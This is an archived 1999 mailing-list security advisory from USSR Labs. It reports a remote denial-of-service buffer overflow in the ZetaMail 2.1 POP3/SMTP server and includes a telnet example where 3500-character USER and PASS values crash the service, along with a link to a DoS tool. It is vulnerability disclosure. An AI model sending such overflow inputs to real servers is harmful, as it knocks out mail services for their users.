Archive : 1999 : november : zetamail - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku
Новости



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Пт, 19 ноя 1999  11:33:09

   От: Ussr Labs <labs@USSRBACK.COM>

 Кому: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

 Тема: Remote D.o.S Attack in ZetaMail 2.1 Mail POP3/SMTP Server Vulnerability

--------------------------------------------------------------------------------




Remote D.o.S Attack in ZetaMail 2.1 Mail POP3/SMTP Server Vulnerability



PROBLEM



UssrLabs found a Local/Remote DoS Attack in ZetaMail 2.1 Mail POP3/SMTP

Server,

the buffer overflow is caused by a long user name/password, 3500 characters.



There is not much to expand on.... just a simple hole



Example:

[gimmemore@itsme]$ telnet example.com 110

Trying example.com...

Connected to example.com.

Escape character is '^]'.

+OK ZetaMail for 95 BD0211 <4294764405.063903189415041@itsme>

USER {buffer)

+OK Send password

PASS  {buffer)



Overflow Crashh.



Where (buffer) is 3500 characters.



Binary / Source for the D.o.s for Windows / Linux:



http://www.ussrback.com/zmail/



Vendor Status:

 Contacted.



Credit: USSRLABS



SOLUTION

 install another program from the same vendor,

 MsgCore/95 2.11,MsgCore/NT 2.10



u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h

http://www.ussrback.com
test server